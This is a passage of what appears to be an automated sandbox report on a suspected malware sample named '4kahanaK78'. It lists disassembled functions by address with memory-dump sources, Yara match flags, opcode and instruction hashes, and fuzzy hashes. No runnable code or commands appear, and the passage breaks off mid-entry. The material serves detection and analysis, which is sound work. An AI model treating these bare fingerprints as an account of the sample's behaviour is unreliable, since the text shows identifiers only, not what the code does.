                                    • SetUnhandledExceptionFilter.KERNEL32(00409955,04B497B6), ref: 04B49BB5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
                                    • Instruction ID: 160f56f175047b98bcb04f76aad41df29ef0812fdf3d1f646e40cac976d24dbb
                                    • Opcode Fuzzy Hash: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
                                    • Instruction Fuzzy Hash:
                                    Function 00409949 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00009955,0040954F), ref: 0040994E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
                                    • Instruction ID: 160f56f175047b98bcb04f76aad41df29ef0812fdf3d1f646e40cac976d24dbb
                                    • Opcode Fuzzy Hash: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
                                    • Instruction Fuzzy Hash:
                                    Function 00882F33 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_819000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: No+
                                    • API String ID: 0-528625556
                                    • Opcode ID: 4b3da43e576934ce25d9d671c6fc8a4cdc5e0f12d0a67e1bd793866cabdbd758
                                    • Instruction ID: 3ede7bdfd30981235f4c42f8339a272393ad896b350bc14e06d0a5b942d58be6
                                    • Opcode Fuzzy Hash: 4b3da43e576934ce25d9d671c6fc8a4cdc5e0f12d0a67e1bd793866cabdbd758
                                    • Instruction Fuzzy Hash: EB7149B3F182145FF308AE29DC8577676CAEB94320F2B453DE689C7780E9795C058386
                                    Function 04CEC7DD Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0
                                    • API String ID: 0-4108050209
                                    • Opcode ID: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                    • Instruction ID: 1b20faf3ed2e5a3898006549f2bdd42645f964e378022ed5f9256f9bdd23f1cc
                                    • Opcode Fuzzy Hash: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                    • Instruction Fuzzy Hash: 8B5148716006895AFB3C9E2F86A97BE679B9F02304F080419D587D7281EB15FB47D352
                                    Function 04CECA0F Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0
                                    • API String ID: 0-4108050209
                                    • Opcode ID: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                    • Instruction ID: 4d038a623b67b2d4d8bb106c9519eaac79460430972acfb6e378cfe107750d19
                                    • Opcode Fuzzy Hash: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                    • Instruction Fuzzy Hash: 0751687134078896EB38CA2FC895BBE779BAB02308F08442DD947DB280E715BB45F356
                                    Function 04B4D644 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 0
                                    • API String ID: 0-4108050209
                                    • Opcode ID: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                    • Instruction ID: b9f3cf54a43b37b6f63110615f6ebe7ae02d2151f078c9cebda4c17c6b13ec97
                                    • Opcode Fuzzy Hash: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                    • Instruction Fuzzy Hash: 05515B7070064866EF799E6C88D47BE77EEDBC2308F0409DED48ADB281E625F944B752
                                    Function 04B4D876 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 0
                                    • API String ID: 0-4108050209
                                    • Opcode ID: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                    • Instruction ID: 27f77c7acea2fc84f8a590b6e4e10ead9a2a83a80aada22a30ccf30e84eacb9e
                                    • Opcode Fuzzy Hash: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                    • Instruction Fuzzy Hash: 4D516C30704648A6EF389EAC88947BE679DEBD2708F0805DED482D72C1D661F946F352
                                    Function 0040D3DD Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0
                                    • API String ID: 0-4108050209
                                    • Opcode ID: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                    • Instruction ID: c0798f424e7f96b2d13f24c6de611a6824aa2a21751a5330029b757c988de18e
                                    • Opcode Fuzzy Hash: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                    • Instruction Fuzzy Hash: 8A513870E04644AADB389AED88957BF67999F01308F54043FD882F73C1D67DAD4E861E
                                    Function 0040D60F Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0
                                    • API String ID: 0-4108050209
                                    • Opcode ID: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                    • Instruction ID: 624e85d5d4f9056646b760ddf11ce83fdf6d5af507a6eedaef23f3504edbf722
                                    • Opcode Fuzzy Hash: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                    • Instruction Fuzzy Hash: B5512370E0474896DB389AE88895BBF67995B12308F14483FD84AF73C1C67E9D4EC61E
                                    Function 0088D918 Relevance: 1.4, Strings: 1, Instructions: 193COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_819000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 3;@Q
                                    • API String ID: 0-133278789
                                    • Opcode ID: fb27fab725d3ad7241824fe616926b19df49fd4099ea8a197e08df3e4784e216
                                    • Instruction ID: 85834ad096e75f899e44f22105cad6105abcbab53119e360884b91050844b707
                                    • Opcode Fuzzy Hash: fb27fab725d3ad7241824fe616926b19df49fd4099ea8a197e08df3e4784e216
                                    • Instruction Fuzzy Hash: B55159E3B152141BF308593EDDD9727A68AE7D4324F1A823DEE459B7C8ECBD49064184
                                    Function 04CF37F9 Relevance: .6, Instructions: 637COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 86f883b8ef09fd6965bd3e087f319760c5b95891c44b121a5311ec8dd1b45090
                                    • Instruction ID: 98ac959fbcbf31f9aa391364da723e162a93da40453b3f395bdb6a7f0ce9ff37
                                    • Opcode Fuzzy Hash: 86f883b8ef09fd6965bd3e087f319760c5b95891c44b121a5311ec8dd1b45090
                                    • Instruction Fuzzy Hash: 75322131E28F414DD7639634CC22336A299AFB73C5F95D737E81AB5EA6EB28D1834104
                                    Function 004143F9 Relevance: .6, Instructions: 637COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 86f883b8ef09fd6965bd3e087f319760c5b95891c44b121a5311ec8dd1b45090
                                    • Instruction ID: 77e6785c828baecb52582d09b1b14edac196714ae9321c17d64660e5f0acdfa7
                                    • Opcode Fuzzy Hash: 86f883b8ef09fd6965bd3e087f319760c5b95891c44b121a5311ec8dd1b45090
                                    • Instruction Fuzzy Hash: DB320531E69F414DD7239634D822336A288AFB73D5F55D737E826B5EA6EB28C4C34108
                                    Function 008546A3 Relevance: .3, Instructions: 322COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_819000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4331efa3e4cd9e9035b55000437494ff58eddc627fb351529adcc15277436f73
                                    • Instruction ID: 13c3743454468a09cf5ce07b4316404b8bc2c630a243100432177bc49d667746
                                    • Opcode Fuzzy Hash: 4331efa3e4cd9e9035b55000437494ff58eddc627fb351529adcc15277436f73
                                    • Instruction Fuzzy Hash: 7BB1AEB3F505250BF3484878CD693B666829B94324F2F423C8F5EAB7C6D8BE5D0A52C4
                                    Function 04CF30E6 Relevance: .3, Instructions: 274COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                    • Instruction ID: c7031f03101d0202a692070b25accc8ab3173f42828be11aaf8418cf64763123
                                    • Opcode Fuzzy Hash: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                    • Instruction Fuzzy Hash: B6B17D31210648EFD754CF18C886B647BA2FF05364F298658ED99CF2B1C739EA82CB40
                                    Function 00AA4C46 Relevance: .2, Instructions: 191COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A9F000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a9f000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0388ea03d020f975314caf6ad8e62dfec7beba9ef163f67e1b0eaba47815d6c4
                                    • Instruction ID: 8b7691f96fa5cb7c1330e53ac4b07854f9196ceab4f3dfff177c07b51dae8ebe
                                    • Opcode Fuzzy Hash: 0388ea03d020f975314caf6ad8e62dfec7beba9ef163f67e1b0eaba47815d6c4
                                    • Instruction Fuzzy Hash: A851C0B240D390AFD306AB24D865669BFF4EF56310F0A896EE5C587292D3744404DBA7
                                    Function 04CE8DB3 Relevance: .1, Instructions: 144COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 752c4a2c8d500711185399bf2f6f55f818018c6fd5b69fec1d7075e323bfd424
                                    • Instruction ID: b9d8271b3f9c33d4557c4a4576e3425dfb6988ab9ea1f00b6dd8598141c681a7
                                    • Opcode Fuzzy Hash: 752c4a2c8d500711185399bf2f6f55f818018c6fd5b69fec1d7075e323bfd424
                                    • Instruction Fuzzy Hash: 3151BCB1E103058FEB25DF5AD9817AABBF2FB48314F54852AC801EB354D339AA11CB65
                                    Function 00AA30A3 Relevance: .1, Instructions: 116COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A9F000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a9f000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e2aa5dabd5d47d8fbba074b59769cbd78824ab37917dcf6f42da845136541547
                                    • Instruction ID: 2ffbae9fcaf7036f7e84e97a073718a321f5944ccc2814577683e6b45ab4841b
                                    • Opcode Fuzzy Hash: e2aa5dabd5d47d8fbba074b59769cbd78824ab37917dcf6f42da845136541547
                                    • Instruction Fuzzy Hash: B13190B241C210EFE715AF19D8455AAFBE9FF98720F268C2DF5C583610E73149409B97
                                    Function 04CF9912 Relevance: .1, Instructions: 104COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                    • Instruction ID: 5718e3f45fb01b4b9af8bb9843be005a69742a386172f406e5f7262e98beb966
                                    • Opcode Fuzzy Hash: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                    • Instruction Fuzzy Hash: BC21B373F204394B7B0CC57ECC522BDB6E1C78C601745823AE8A6EA2C1D96CD917E2E4
                                    Function 04B5A779 Relevance: .1, Instructions: 104COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                    • Instruction ID: 53a9b4596741b4d703b3dee2c66b20d577f2960826688a38eeab8e35c5903ed5
                                    • Opcode Fuzzy Hash: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                    • Instruction Fuzzy Hash: 2321B373F205394B7B0CC57E8C522BDB6E1C78C601745823AE8A6EA2C1D96CD917E2E4
                                    Function 0041A512 Relevance: .1, Instructions: 104COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                    • Instruction ID: 1ad9d6d7365e600a7bb69782b0834f4d420f3f91d9e0c3ac1aa475b9fcfe298e
                                    • Opcode Fuzzy Hash: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                    • Instruction Fuzzy Hash: 6521B673F2043947770CC57ECC522BDB6E1C78C501745423AE8A6EA2C1D96CD917E2E4
                                    Function 009694FC Relevance: .1, Instructions: 103COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_819000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 018ba101057622a82a76edb0a296d61167f108d7a43d3e8a446acfe5abe04db2
                                    • Instruction ID: 73be84f0a593e34bcc2d27a760d4a4752033f2e1fd5c414317f5686b9ea08071
                                    • Opcode Fuzzy Hash: 018ba101057622a82a76edb0a296d61167f108d7a43d3e8a446acfe5abe04db2
                                    • Instruction Fuzzy Hash: 3F3127F3E182101BF34C9528EC96727B2C6ABD4320F1E873E9E5AD33C1E8ADAD054195
                                    Function 04CF97F2 Relevance: .1, Instructions: 81COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                    • Instruction ID: f0098194cef53a99a5c501967b9cf24841fb35c31397b7ca8774a3519f6b4b04
                                    • Opcode Fuzzy Hash: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                    • Instruction Fuzzy Hash: 1011A763F30C255B675C81698C1327AA1D2EBD815074F433AD826E7284E8A4EE13D290
                                    Function 04B5A659 Relevance: .1, Instructions: 81COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                    • Instruction ID: e73887866517eae7714d013718d8a8bd1de4ec71e4a0f3fa3c223a6bd36a49e9
                                    • Opcode Fuzzy Hash: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                    • Instruction Fuzzy Hash: 3911A723F30C255B675C81698C1727AA1D2DBDC14030F433AD826E7284E894DE13D290
                                    Function 0041A3F2 Relevance: .1, Instructions: 81COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                    • Instruction ID: f1e66852e6b8581706c01849561528f719d4aeccf6fe4fc0aff0fb2656777429
                                    • Opcode Fuzzy Hash: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                    • Instruction Fuzzy Hash: D6118A73F30C255B675C816D8C172BAA5D2EBDC25074F533AD826E7284E998DE23D290
                                    Function 04CE9D60 Relevance: .1, Instructions: 76COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                    • Instruction ID: 26b9b63659b74d42d569804443eca3166b2110a897851afa81f8b7592a678c22
                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                    • Instruction Fuzzy Hash: 9A1104F72401A243D6048A2FC8F56FBE797EBC632172C426AD0428BB58E333F3559600
                                    Function 100102A0 Relevance: .1, Instructions: 76COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                    • Instruction ID: 6858cf0c51ff5caabfc3a7f957f7e97cc4d55c404d013567cdc706fa4bfc5bf2
                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                    • Instruction Fuzzy Hash: 5111087774118243D681C56DC4F86ABA3DEFBC52A0729436AF0D28FA58D2F2DAC5A600
                                    Function 04B4ABC7 Relevance: .1, Instructions: 76COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                    • Instruction ID: 7a73fe8d35e3d71c5c24f5c0b821b3dd9abe8ae56d6465770b908d97031b84e3
                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                    • Instruction Fuzzy Hash: DC1108772C0151439695CB2DDDB41BAA796EBCD32072C46EAD0414F75AD122F544B600
                                    Function 0040A960 Relevance: .1, Instructions: 76COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                    • Instruction ID: bf3d62387290270b8e9c206f9b330aa6ec5fad9da35dacc9460757c01b80fc97
                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                    • Instruction Fuzzy Hash: 43115EF730038143D704862EC5B45B7E395EBC6321B2F4B7BC0825B7C8C23A9865E50A
                                    Function 00D890A3 Relevance: .1, Instructions: 61COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3307293303.0000000000D89000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D89000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d89000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                    • Instruction ID: 1eba06374248a319380b9ff93c9580b1e09e22f207747a03da85b3d9d7681480
                                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                    • Instruction Fuzzy Hash: 0611AC72340201AFD744EE55DCD5EA6B3EAEB88320B2D8065ED48CB352D676E802C760
                                    Function 04B40D90 Relevance: .0, Instructions: 43COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                    • Instruction ID: 293818218bedeef1481949536c6cc3e7b8a6b3c3ef9f58d5a142aa209fb16be8
                                    • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                    • Instruction Fuzzy Hash: 8801A276A006148FDF21EF24CC04BAA33F5EFC6216F4548F5EA0A9B281E774B9459B90
                                    Function 04CF2A6F Relevance: .0, Instructions: 22COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                    • Instruction ID: 1921a5297b8c6c131afecabf540933813d04e502e30cb84c4d37dd4a19787586
                                    • Opcode Fuzzy Hash: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                    • Instruction Fuzzy Hash: 04E08C32911238EBCB24DB9DC90498AF3EDEB44B00B1544A6B601D3200C274EE00E7D0
                                    Function 10007A76 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Memory Dump Source
